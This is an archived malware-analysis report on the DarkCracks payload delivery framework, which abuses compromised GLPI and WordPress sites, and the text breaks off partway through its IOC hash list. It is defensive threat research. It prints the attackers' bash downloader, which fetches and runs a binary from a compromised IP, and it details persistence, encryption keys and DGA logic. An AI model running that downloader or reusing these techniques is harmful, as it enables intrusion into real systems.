{ "id": "6f5204ed-2a83-4eb4-b259-f5a98a0251ef", "created_at": "2026-04-06T00:18:28.047241Z", "updated_at": "2026-04-10T13:12:05.473413Z", "deleted_at": null, "sha1_hash": "8f5cd75afa28ad746878a11cc39117822e9caeaa", "title": "Uncovering DarkCracks: How a Stealthy Payload Delivery Framework Exploits GLPI and WordPress", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6472629, "plain_text": "Uncovering DarkCracks: How a Stealthy Payload Delivery\r\nFramework Exploits GLPI and WordPress\r\nBy Alex.Turing\r\nPublished: 2024-09-04 · Archived: 2026-04-05 16:20:59 UTC\r\nSummary\r\nXLab's Cyber Threat Insight and Analysis system(CTIA) recently detected a sophisticated malicious payload\r\ndelivery and upgrade framework, which we have named DarkCracks. This framework is characterized by its zero\r\ndetection rate on VirusTotal, high persistence, stealth, and a well-designed upgrade mechanism, leveraging high-performance, stable online infrastructure as its backbone.\r\nBased on our data, DarkCracks is a meticulously crafted malware, indicating that its creators are far from mere\r\nscript kiddies. While we have mapped out its payload delivery and upgrade framework, the high level of stealth\r\nemployed by DarkCracks has left us with limited visibility into its Launcher component as of now.\r\nHowever, on August 26th, we observed a new password-protected PDF file named \"resume\" being added to the\r\ngithub repository. This file was later renamed to the Korean name \"김영미 이력서\" (Kim Young-mi's resume) .\r\nGiven the commonality of this Korean name, we strongly suspect that part of this component’s functionality\r\ninvolves social engineering activities targeting Korean-speaking users.\r\nDarkCracks exploits compromised GLPI and WordPress sites to function as Downloaders and C2 servers. These\r\ncompromised sites are used to collect sensitive information from infected devices, maintain long-term access, and\r\nserve as relay nodes to control other devices or deliver malicious payloads, effectively masking the attacker’s\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 1 of 28\n\ntracks. Within our monitoring scope, targeted entities include public service systems across different countries,\r\nsuch as school websites, public transportation systems, and even prison visitor systems.\r\nDiscovery Journey\r\nOn June 5, 2024, CTIA issued an ELF_Downloader alert for the network traffic associated with ELF file\r\n8b3d2b156424e5a0dc3f6d2b0dec96b2. The traffic, HTTP in nature, was traced to the download path\r\n/vendor/sabre/event/lib/Promise/wk8dnj2k-x64-musl , which exhibited unusually deep directory structures,\r\nraising suspicions of a potential breach. Upon further investigation, we confirmed that the server at IP\r\n45.169.87.67 had been compromised, with the attack surface being the GLPI system running on that IP. The file\r\nwk8dnj2k-x64-musl was identified as a Runner, responsible for decrypting a JSON configuration file specified\r\nby its parameters, downloading, decrypting, and executing the Client designated in the clientUrl field. The\r\nClient's role is to report the compromised device's information, driven by C2-issued configuration files, and to\r\ndownload updates for the Runner, Client, Launcher, and other components. As of now, both Runner and Client\r\ncomponents have a zero detection rate on VirusTotal, indicating that they have been operating stealthily under the\r\nradar of security vendors for over a year.\r\nOn June 12, 2024, another download script, f8a495a98c43b0805f53be14db09c409 , came to our attention. It\r\nutilized a similar download path, /vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl . This file was\r\nstrikingly similar to wk8dnj2k-x64-musl , and the server at IP 179.191.68.85, also running GLPI services, was\r\nfound to host it.\r\nThe appearance of similar files with different names, hosted on different servers and paths, strongly indicated the\r\npresence of an unknown attacker actively breaching GLPI systems and leveraging compromised devices as\r\ninfrastructure to conduct their cybercriminal activities. To trace the origins, we embarked on a thorough\r\ninvestigation, uncovering key insights into the samples, configuration files, C2 servers, and targeted victims.\r\n1. The compromised systems were found to belong to critical infrastructure across different countries,\r\nincluding school websites, public transportation systems, and prison visitor systems.\r\n2. Through the XLab command tracking system, we intercepted a directive to change the C2 server, which\r\npointed to a compromised WordPress site.\r\n3. We discovered a GitHub project named \"soduku1,\" created on July 11, 2023, which stored configuration\r\nfiles.\r\n4. On VirusTotal, we identified an ELF file, c447f7980a18205f309d8432f312fe69 , sharing the same origin as\r\nthe Client. The file contained a source path /home/erin/Desktop/Works/smart-update/SmartUpdate/client .\r\n5. XLab proactively contacted the victims, gaining access to the C2 Panel, ultimately uncovering the\r\nworkings of the \"Admin Mode.\"\r\n6. Additionally, we found another GitHub project, \"ftMQPwsMnB,\" containing a decoy file titled \"김영미 이\r\n력서\" (Kim Young-mi's resume) and QuasarRAT.\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 2 of 28\n\nIn conclusion, a well-designed malicious payload delivery and upgrade framework, active for over a year, has\r\ncome into sharp focus. This framework, which we have named DarkCracks based on the use of the XOR key\r\n\"Crackalackin,\" leverages compromised GLPI and WordPress sites as Downloaders and C2 servers.\r\nIts primary objectives are to gather sensitive information from infected devices, maintain long-term access, and\r\nuse the compromised, stable, high-performance devices as relay nodes to control other devices or deliver\r\nmalicious payloads, effectively obfuscating the attacker’s footprint.\r\nThe high persistence, stealth, and sophisticated upgrade design, coupled with the strategic selection of stable\r\nonline infrastructure, suggest that the attackers behind this framework are far from ordinary script kiddies.\r\nDespite our current inability to capture the Launcher component and monitor DarkCracks' further activities, the\r\nfact that it has remained undetected by security products for over a year underscores the stealth and efficiency of\r\nits attack methods. This warrants serious attention, and we have documented our findings to share with the\r\nsecurity community.\r\nTargeted Victims\r\nDarkCracks assigns different roles based on the performance of the victim's device: high-performance devices\r\nhandle infrastructure roles, such as C2 and Downloader, while lower-performance devices act as Bot nodes.\r\nDarkCracks targets include WordPress and GLPI. WordPress is a globally recognized web content management\r\nsystem, which I won't elaborate on here. GLPI (Gestionnaire Libre de Parc Informatique) is a lesser-known open-source IT asset and service management system, used to help organizations manage their IT assets, including\r\nhardware, software, and network devices. It is widely used in small to medium-sized enterprises, educational\r\ninstitutions, and government agencies to enhance IT infrastructure management and maintenance.\r\nAmong the 13 C2/Downloader instances we observed (compromised devices), there are important targets\r\ninvolving city public transport systems, prison visitor scheduling systems, financial institutions, and other key\r\norganizations across various countries.\r\nAccording to QiAnXin EagleMap, 10,157 GLPI services are currently exposed online. Organizations using GLPI\r\nshould urgently check and secure their systems.\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 3 of 28\n\nTimeline\r\nBased on the information we have gathered, we have compiled the following timeline of DarkCracks' activities.\r\nPlease note that this is only based on our current intelligence, and DarkCracks' actual activities may have started\r\nearlier.\r\n2023.07.11: The user \"adrhpbrn29\" created the project \"soduku1\" to store backup configuration files.\r\n2023.07.18: An unencrypted Client was uploaded to VirusTotal from China, with sensitive strings left\r\nunencrypted.\r\n2024.05.23: Runner samples were uploaded to VirusTotal from Poland, South Korea, the Netherlands, the\r\nUK, Germany, and the US. The sensitive strings in these samples were fully encrypted.\r\n2024.06.05: DarkCracks Downloader was first detected when XLab discovered that the IP address\r\n45.169.87.67 had been compromised, hosting multiple Runners (including the ones from May 23rd),\r\nconfiguration files, and Client downloads.\r\n2024.06.06: Analysis of the Runner was completed, successfully decrypting the configuration files and\r\nClient. It was found that backup configurations were stored on GitHub, with a version number of SUC 2.0.\r\nSome CPU architecture samples supported DGA (Domain Generation Algorithm).\r\n2024.06.10: An updated C2 command was intercepted, indicating that the new C2 server was a\r\ncompromised WordPress site.\r\n2024.06.12: The IP address 179.191.68.85 was found to be compromised, serving as a download server for\r\nDarkCracks. Backup configurations were stored on Pastebin with a version number of SUC 2.01, with all\r\nCPU architectures supporting DGA.\r\n2024.06.14: A victim provided XLab with implants left by the hackers on their device, including a C2\r\npanel, configuration files, etc.\r\n2024.07.23: Another Runner sample was uploaded to VirusTotal from Finland, Japan, and the US. This\r\nsample did not have encrypted sensitive strings and did not support DGA.\r\n2024.08.23: The user \"adrhpbrn29\" created the project \"ftMQPwsMnB\" to distribute QuasarRAT.\r\nTechnical Details\r\nNext, we'll start with the Downloader and gradually introduce the key components of DarkCracks: Runner, Client,\r\nLauncher, and the C2 Panel. By thoroughly analyzing the functions of each component, we aim to clarify the\r\nframework's design principles and uncover how DarkCracks covertly delivers its payloads through these elements.\r\nPart 1: Downloader Analysis\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 4 of 28\n\nRegarding the Downloader, we've observed two distinct forms: one is a Metasploit Stager that first receives\r\nshellcode to build a shell execution environment before executing a wget download; the other is a bash script\r\nthat directly downloads files via wget or curl .\r\n0x01: Metasploit Stager\r\n MD5: 8b3d2b156424e5a0dc3f6d2b0dec96b2\r\n Magic: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked\r\nThe Stager communicates with 213.139.233.163:18441, generating network traffic as shown below. Its purpose is\r\nto request the file wk8dnj2k-x64-musl from 45.169.87.67.\r\nThe file wk8dnj2k is, in fact, DarkCracks' Runner component. On 45.169.87.67, we discovered multiple variants\r\nof the Runner ( wk8dnj2k-{cpu}-{compiler} ) compiled for ARM, MIPS, and x86/64 CPU architectures using\r\ndifferent compilers like gnu, uclibc, and musl. We also found encrypted Client files ( se3hf6jwc-{cpu}-\r\n{compiler} ) and encrypted configuration files ( qoakeifm-unknown.txt ).\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 5 of 28\n\n0x02: Bash Script\r\nMD5: f8a495a98c43b0805f53be14db09c409\r\nMagic: Bourne-Again shell script text executable\r\nThe script's functionality is straightforward: it requests pQ1iM9hd-x64-musl and j8UgL3v from 179.191.68.85.\r\nThe former is a Runner, while the latter is an encrypted configuration file.\r\n#!/bin/bash\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /;\r\nwget \"http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl\" -O wdvsh|curl \"http://179.1\r\nwget http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -O agr|curl http://179.191.68.85:82/ven\r\nchmod +x ./wdvsh;\r\n./wdvsh agr;\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 6 of 28\n\nsleep 3;\r\nrm ./wdvsh;\r\nrm ./agr;\r\nSimilarly, 179.191.68.85 also hosts various DarkCracks entities for different CPU architectures.\r\nPart2: Runner Analysis\r\nThe Runner hosted on 45.169.87.67, identified as wk8dnj2k-{cpu}{compiler} , is version 2.0, while the\r\npQ1iM9hd series from 179.191.68.85 is version 2.01. The differences between them are minimal. This analysis\r\nfocuses primarily on the wk8dnj2k Runner for the x64 CPU architecture. Below is its basic information:\r\nName: wk8dnj2k-x64\r\nMD5: 93a7cba1edbacb633021ebc38c10a79f\r\nMagic:ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Lin\r\nAs the name suggests, the Runner’s primary function is to act as a launcher, responsible for downloading,\r\ndecrypting, and executing the Client. Specifically, when the Runner executes, it first checks the runtime\r\nparameters and supports a maximum of one parameter: an encrypted JSON configuration file. A valid\r\nconfiguration file, once decrypted, must include at least three fields: key (the key and IV needed to decrypt the\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 7 of 28\n\nClient), emUrl (the download address for the backup configuration file), and clientUrl (the download address\r\nfor the encrypted Client).\r\nUpon validating the configuration file, the Runner creates a working directory at /var/tmp/.shm , moves itself to\r\nthat directory, and renames itself to a UUID-formatted filename. It then generates a new encrypted file,\r\n2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1 , with the SH3 field containing the content of the original configuration\r\nfile. The Runner achieves persistence through methods like crontab, .bash_profile , or /etc/init.d/rnd .\r\nFinally, it downloads, decrypts, and executes the Client.\r\nIf no parameter is specified, the Runner checks for the existence of the file /var/tmp/.shm/2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1 , retrieves the configuration file through the SH3 field, and proceeds with the decryption,\r\ndownload, and execution of the Client.\r\n0x01: Decrypting Sensitive Strings\r\nTo protect its functionality from easy detection, the Runner pre-encrypts sensitive strings and decrypts them as\r\nneeded using the decstr function.\r\nTo decrypt these strings, one can use flare_emu to emulate the decstr function. For example, the ciphertext\r\n“9MwEVEVWWExM5AkO” corresponds to the plaintext “clientUrl.”\r\nimport flare_emu\r\ndef ignorefree(eh, address, argv, funcName, userData):\r\n eh.uc.reg_write(eh.regs[\"rax\"], 0)\r\nciphertxt=b'9MwEVEVWWExM5AkO'\r\neh=flare_emu.EmuHelper()\r\neh.apiHooks['free']=ignorefree\r\neh.emulateRange(startAddr=0x00000000000F9D0,skipCalls=False,registers={'rdi':ciphertxt})\r\nprint(eh.getEmuString(eh.getRegVal('ret')))\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 8 of 28\n\nOf course, as a security analysis, a simple black-box decryption is insufficient. After thorough examination, the\r\ndecryption logic of the decstr function can be broken down into three steps:\r\n1. Reverse the string and decode it using Base64 URLSafe mode.\r\n2. XOR each byte with “Crackalackin’”.\r\n3. Swap the case of English letters and decode again using Base64 URLSafe mode.\r\nUsing the IDAPython script in the appendix, the encrypted strings can be restored and patched, making reverse\r\nengineering much easier.\r\n0x02: Decryption Configuration\r\nWe captured two configuration files, qoakeifm-unknown and j8UgL3v . These files use the same encryption\r\nmethod as the sensitive strings. Once decrypted, it’s noteworthy that the emUrl directs to backup configurations\r\nstored on third-party platforms like GitHub and Pastebin.\r\nConfiguration file qoakeifm-unknown from 45.169.87.67:\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 9 of 28\n\nConfiguration file j8UgL3v from 179.191.68.85:\r\nEach field in the configuration file is described in the table below:\r\nItem Description\r\nkey AES KEY\u0026IV\r\nurl Client Report Entry\r\nauthHeader Auth String\r\nemUrl Backup Config\r\nrunnerUrl Runner Download URL\r\nclientUrl Client Download URL\r\n0x03: Persistence Mechanism\r\nUpon successfully decrypting a valid configuration file, the Runner creates the working directory\r\n/var/tmp/.shm , moves itself to that directory, renames itself with a UUID, and generates a new encrypted\r\nconfiguration file, 2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1 .\r\nAfter move the file, the Runner achieves persistence using one of the following methods:\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 10 of 28\n\n1. If the device supports crontab, it uses crontab for persistence.\r\n2. If crontab is unavailable and the current user is a regular user, persistence is achieved through\r\n.bash_profile .\r\n3. If crontab is unavailable and the current user is root, persistence is achieved through /etc/init.d/rnd .\r\n0x04: Downloading the Encrypted Client\r\nThe Runner attempts to download the encrypted Client by iterating through three different types of URLs. If any\r\nof them succeed, the loop exits; otherwise, it waits 6 to 18 hours before trying again. We refer to this as the three-https://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 11 of 28\n\nlayer URL task polling.\r\nclienturl: Direct mode. Simply concatenate the CPU architecture string of the sample to get the Client’s\r\ndownload address.\r\nemurl and dgaurl: Indirect mode. They first download the page pointed to by the URL, locate the backup\r\nconfiguration using the seed_string , then decrypt it to obtain the new clienturl . This forms a\r\nredundant structure where the first layer (clienturl) typically points to compromised sites, which are\r\nunstable and may be cleaned up. The second layer (emurl) points to third-party content hosting platforms,\r\nwhich are more stable but still carry a risk of being banned. The final layer (dgaurl) is generated monthly\r\nas a last resort.\r\nEmUrl\r\nThe process for handling clienturl is straightforward, so let’s focus on emurl and dgaurl . For example, the\r\nemurl in the qoakeifm-unknown configuration file\r\n( https://raw.githubusercontent.com/adrhpbrn29/sudoku1/main/main.cpp ) contains the following backup\r\nconfiguration in the seed_string variable.\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 12 of 28\n\nAfter decrypting the seed_string , the Runner re-enters direct download mode upon obtaining the clienturl .\r\nThe sudoku1 project was created on July 11, 2023, at 17:08:29, with the first record containing seed_string\r\nsubmitted at 17:24:02. Currently, there are six submission records.\r\nCommit Date authHeader\r\ne1e10dc 2024.03.28 LJHRQWE\r\nabb67fc 2024.03.13 LJHRQWE\r\n6392b06 2023.12.27 LJHRQWE\r\nc72963b 2023.10.04 SLDJKFA\r\n248c8a8 2023.10.04 Linux Max\r\n5970967 2023.07.11 Rbz021g6\r\nUsing git diff , we verified all submission records and found changes concentrated in the seed_string\r\nvariable in main.cpp , from which we extracted six different clienturl and C2url (details in the IOC section\r\nunder GitHub).\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 13 of 28\n\nIn the configuration file j8UgL3v , the emurl is https://pastebin[.]com/raw/GYEBVyMR . Besides providing the\r\naforementioned seed_string (details can be found in the Pastebin section of the IOC), it also gives us another\r\nperspective: the IP statistics of visitors to this page. Currently, the number of unique IPs accessing this page is\r\napproaching 300.\r\nDGAUrl\r\nThe logic for handling dgaurl is similar to emurl , but the difference lies in their source. While emurl comes\r\nfrom the configuration file, dgaurl is algorithmically generated. The algorithm is simple: a domain is generated\r\nmonthly by formatting the current “year\u0026month” as “%d%02d”, encrypting it with the string encryption\r\nalgorithm described earlier, and then appending it to “http://%s.com” to form the dgaurl . For example, the DGA\r\ndomain generated for “202408” is UVDFUgOAgjL.com .\r\nWe checked the dgaurl from 2023 to the present (details in the IOC section under DGA) and found that all\r\ndomains are unregistered. This indicates that DarkCracks has remained well-hidden, with the emurl mechanism\r\nundetected by the security community, so much so that they haven’t felt the need to activate the final emergency\r\nmeasure.\r\n0x05: Decrypting and Executing the Client\r\nThe Client is encrypted using AES CBC mode, with the decryption key and IV provided in the configuration file’s\r\nkey . The key is a hex string where the first 16 bytes are the key and the last 16 bytes are the IV. The keys in\r\nthe two captured configuration files are identical:\r\n2D8C7FEE42D3DB4A8E55FBFF65351E1BB8ADDBA8FCBD0F85EE1CA5033D0DF342 .\r\nAES Key: 2D 8C 7F EE 42 D3 DB 4A 8E 55 FB FF 65 35 1E 1B\r\nAES IV: B8 AD DB A8 FC BD 0F 85 EE 1C A5 03 3D 0D F3 42\r\nOnce the Runner successfully decrypts the Client, it saves it in the /tmp directory, launches it using the execl\r\nfunction, and deletes itself.\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 14 of 28\n\nPart3: Client Analysis\r\nIn this section, we'll focus on analyzing the se3hf6jwc-x64 Client. Below are its basic details before and after\r\ndecryption (interested readers can use the CyberChef script provided in the appendix to decrypt the Client).\r\nName:se3hf6jwc-x64\r\nMD5:81eccc9c10368aa54cfed371f83da45a\r\nMD5:fe5f484f71bf0fd7afa56e60da7eec6f (Decrypted)\r\nMagic:ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Lin\r\nUpon analysis, we confirmed that the Client uses a similar architecture to the Runner, namely a \"configuration\r\nfile-driven + three-layer URL task polling\" structure. However, unlike the Runner, which primarily polls the\r\nclientUrl , the Client's focus is on the C2 reporting endpoint specified in the url field of the configuration\r\nfile. The Client encrypts and reports sensitive device information to the C2 server, which then sends back\r\nencrypted configurations that drive the execution of different tasks.\r\nKey tasks include:\r\nNewVersion: Download and update the Runner and Client.\r\nNewLauncherVersion: Download and update the Launcher.\r\nversionCheckerUrl: Update the C2 reporting endpoint.\r\n0x01: C2 Communication\r\nThe Client constructs a JSON-formatted beacon with the following code snippet, encrypts it, and sends it as the\r\nHTTP body to the C2 server. The Client supports both HTTP and HTTPS. Notably, the platform field's value is\r\nformatted as \"arch/user(euid)/version\" , with the version obtained from /proc/version .\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 15 of 28\n\nAs seen in actual captured traffic, the body of the interaction is encrypted.\r\nAfter decrypting the C2 response, we see that the Client receives a message with a versionCheckerUrl field. The\r\nClient then updates its C2 reporting endpoint and requests a new configuration file:\r\n{\r\n \"versionCheckerUrl\": \"https:\\\\/\\\\/www.miracles.com.hk\\\\/wp-content\\\\/plugins\\\\/foxiplugin\\\\/detail.php\",\r\n \"authHeader\": \"Linux MaEW\"\r\n}\r\n0x02: Speculations on the Launcher Component\r\nWhile we have not captured the Launcher component, we can infer the following details based on how the Client\r\nhandles NewLauncherVersion :\r\nThe Launcher is stored encrypted on a remote server, using AES encryption.\r\nThe Launcher likely supports the same encryption algorithm as the Runner and Client.\r\nThe Launcher is also driven by a configuration file, with core configurations stored at\r\n/var/tmp/.shm/9d8dadaf-6c7e-4975-b26d-ec17e67493c6 .\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 16 of 28\n\n0x03: Evolution of the Client\r\nWe compared the 2.0 and 2.01 versions of the Client samples. The primary differences are whether sensitive\r\nstrings are encrypted and whether the Client supports the DGA algorithm. These changes seem aimed at\r\nenhancing the Client's stealth and robustness.\r\nVersion Encrypted String DGA Support\r\nSUC 2.0 N (x86/x64 Y) N (x86/x64 Y)\r\nSUC 2.01 Y Y\r\nInterestingly, even in SUC 2.0, the x86/64 architecture Client already supported sensitive string encryption and\r\nDGA features. This indicates that DarkCracks takes a cautious approach to feature upgrades, initially testing new\r\nfeatures on select architectures before rolling them out to all architectures once they are fully functional and\r\nstable.\r\nPart4: C2 Panel Analysis\r\nA user whose device was compromised provided us with the C2 Panel files. Below is the basic information about\r\nthe file:\r\nMD5: 8103a187a710378020dbdee8ff213b5b\r\nMD5: 69ef27f8e69dbba222c3c33a53906d79 (Deobfuscate)\r\nObfucation: Yes\r\nThe file is heavily obfuscated, but it can be deobfuscated by gradually replacing eval with print .\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 17 of 28\n\nThe C2 Panel is implemented in PHP and consists of around 600 lines of code. Its functionality is relatively\r\nsimple and can be summarized as handling requests from different sources based on a hardcoded configuration\r\nfile, tem9FG5.tmp . It operates in two modes: management mode and business mode.\r\nManagement Mode: This mode handles requests from the Bot Master. The C2 Panel performs operations\r\nlike adding, deleting, modifying, and querying the configuration file based on the request.\r\nBusiness Mode: In this mode, the C2 Panel decides whether to log the Bot or respond to it based on the\r\nconfiguration file.\r\nRequest Source Identification\r\nThe C2 Panel distinguishes the request source using the authentication field. If the field's value is\r\nStatistics , the request is from the Bot Master; otherwise, it's from a Bot. Another role of the authentication\r\nfield is to verify whether the request is from a legitimate Bot. Each C2 Panel has a specific authHeader set\r\nduring initialization, and the C2 only responds when the Bot's authentication matches the C2's authHeader .\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 18 of 28\n\nConfiguration File ( tem9FG5.tmp )\r\nThe configuration file, tem9FG5.tmp , acts like a database, recording the Bot Master's settings and storing\r\ninformation about the Bots. To understand the format and fields supported by this configuration file, we generated\r\na configuration file by sending two test requests to a test machine, simulating the initialization and Bot check-in.\r\n1. Initialize the Configuration\r\n{\"authentication\":\"Statistics\",\"isActive\":true,\"authHeader\":\"XLab\"}\r\n2. Bot Check-in\r\n{\"authentication\":\"XLab\",\"uuid\":\"fac60bdc-5786-415e-8992-79abcb132d64\",\"platform\":\"x64 / root(0) / Linux\r\nThe generated network traffic is as follows:\r\nThe C2 Panel on the test machine generated the following encrypted configuration in response to the above\r\nrequests:\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 19 of 28\n\nDecrypting the configuration file is straightforward, requiring the use of strrev(convert_uudecode($input)) .\r\nThe decrypted plaintext matches our constructed requests, indicating that the configuration file is in JSON format.\r\nBot-related information is stored in the clients field, while the authHeader is stored in the config field.\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 20 of 28\n\nBelow is a description of the fields supported in the configuration file:\r\nField Description\r\nconfig C2 Status\r\nclients Bot info\r\npendingChanges Config to be delivered\r\nsessions Command output from Bot\r\nsessionCommands Commands to be delivered\r\nThe Bot Master uses the pendingChanges and sessionCommands fields to deliver instructions to the Bot. The\r\nfollowing code snippet illustrates how the C2 Panel checks the client's uuid to decide whether to issue the\r\nLauncher configuration.\r\nThe configuration file provided by the victim mentioned a compromised site, soussanart.com . We sent a client\r\nquery request to this site and obtained information about 76 clients, spread across 17 countries and involving 4\r\ndifferent versions, ranging from 1.2 to 2.02.\r\nThis concludes our analysis of DarkCracks. Clearly, many puzzles remain unsolved, and we believe this is just the\r\nbeginning of uncovering the full extent of this threat.\r\nPart5: ftMQPwsMnB Analysis\r\nOn August 23, 2024, as we were wrapping up our previous analysis, we noticed that the user adrhpbrn29 had\r\ncreated a new project named ftMQPwsMnB . The project contains a single compressed file named bzupdater.zip ,\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 21 of 28\n\nwhich includes three files: config.ini , Updater.exe , and version.dll .\r\n0x01: Initial Analysis\r\nA quick analysis confirmed that version.dll is malicious. Its function is to use the AES algorithm to decrypt a\r\nbinary resource, which ultimately yields a shellcode. This shellcode loads a payload that is an open-source remote\r\ncontrol trojan, QuasarRAT. The AES key is FCFF50FB13B09C44F806CF4947381718 , and the IV is\r\n2DD695D6845AA9F83F0071B709D78CBD . In addition to AES, XOR encryption is used to decrypt strings, with the\r\nXOR key being quackquack .\r\nCurrently, the ftMQPwsMnB project has five commit records. Although the MD5 hash of version.dll varies\r\nwith each commit, there are actually only three different core binaries.\r\nCommit MD5 of version.dll MD5 of \"Binary\"\r\n7ddc62e 456d05566fc3391e195a5f9cb346c92c 91bcbf4de7ff8bddebdc49b62cad1ac1\r\nab75b85 c2d69f5e5fa2af8131f1cb3d9fdfbd4b 05481286a1aa1f0d7d9df7bbbb3aeb73\r\nab6a892 9e94126e8a26efd10b2a5b179d64be90 05481286a1aa1f0d7d9df7bbbb3aeb73\r\n271b28c ceb7f3d92096892410e041a3b318ab9b 05481286a1aa1f0d7d9df7bbbb3aeb73\r\n653eb26 ca93591a9441a2ade70821f67292d982 6176c8374cd656783c9b354944c8052e\r\n0x02: QuasarRAT Payload\r\nQuasarRAT is a well-known remote access Trojan (RAT), and there are numerous analyses available online for\r\nthose interested. In this case, the configurations for the three shellcodes delivering QuasarRAT are nearly\r\nidentical, differing mainly in the C2 server port. For example, the QuasarRAT delivered by the ab75b85 commit\r\nhas the following configuration:\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 22 of 28\n\nAs of now, we haven't identified the exact distribution method for this project. However, the config.ini file\r\nreferences Bandisoft, a paid software, suggesting that one potential distribution method could be enticing users to\r\ndownload and install the software by offering a cracked version for free.\r\n0x03: Suspicious PDF File\r\nOn August 26, the project received two additional commit records, adding a PDF file initially named\r\nresume.pdf . This file is password-protected, so we currently do not know its contents. About 50 minutes later,\r\nthe file was renamed to the Korean title 김영미 이력서.pdf , which translates to \"Kim Young-mi's resume.\"\r\nResumes are common phishing lures, leading us to speculate that one of DarkCracks' targets might be Korean-speaking users.\r\nDate Commit Filename MD5\r\n2024/08/26 09:19:32 5130de3 resume.pdf 71ebe71eec7e0f2420cd931534dd22c3\r\n2024/08/26 10:09:27 a04bf51 김영미 이력서.pdf 71ebe71eec7e0f2420cd931534dd22c3\r\nConclusion\r\nDarkCracks is a well-designed yet flexible payload delivery and upgrade framework with several outstanding\r\nadvantages. For instance, its three-layer URL polling mechanism provides robust reliability, ensuring that\r\npayloads can be delivered even when some delivery methods fail. The framework’s use of encrypted delivery for\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 23 of 28\n\nmultiple components, along with the self-deletion of these components after execution, effectively safeguards its\r\ncore functionalities from detection.\r\nHowever, there are notable shortcomings. One significant vulnerability lies in its use of a reversible algorithm for\r\ndelivering backup configurations via DGAUrl, which poses the risk of the entire network being hijacked.\r\nAdditionally, the C2 Panel’s management mode is easily accessible; anyone familiar with the protocol can modify\r\nor even wipe the configuration file, potentially leading to the C2’s shutdown and network paralysis.\r\nWe recommend that network administrators monitor the /var/tmp/.shm directory as described above to detect\r\npotential infections. Victims are encouraged to contact us for technical support.\r\nThis is the extent of our current knowledge on DarkCracks. Our analysis is based on our perspective and is\r\nundoubtedly limited. We invite other industry experts with unique insights to contribute additional information,\r\nhelping us refine the profile of DarkCracks. If you are interested in our research, you can also contact us via the X\r\nplatform to obtain more detailed information.\r\nIOC\r\nMD5\r\nRunner\r\nc30e9934299fd43527834086b6cfa26a *pQ1iM9hd-armv5-uclibc\r\n8c53e98685fc3ce8b86055991b905926 *pQ1iM9hd-armv6-gnu\r\n257c9ec1241b3fa59565edec9689276b *pQ1iM9hd-armv8-gnu\r\n281e4ede8ffc0f854ce671b5b3ae06f8 *pQ1iM9hd-mips-uclibc\r\n21732589b41506e1e7de87d7066ea43e *pQ1iM9hd-mipsel-uclibc\r\n93a7cba1edbacb633021ebc38c10a79f *pQ1iM9hd-x64\r\n036d6c73fe7a568160f3de8a98d0a58b *pQ1iM9hd-x64-musl\r\n5340ee724893fd596852f22ecbc3e795 *pQ1iM9hd-x86\r\nc6909b8b8bc55fac85c5fe650c7df42a *wk8dnj2k-armv5-uclibc\r\n227d19736af70bef817da96668994af8 *wk8dnj2k-armv6-gnu\r\na18957196842c78cbce2247d766712ad *wk8dnj2k-armv8-gnu\r\n0dd9e350aafe0d1c9e619d27ebd2ccfd *wk8dnj2k-mips-uclibc\r\n8859d9b1c3f41b9dad3cee68adaddd92 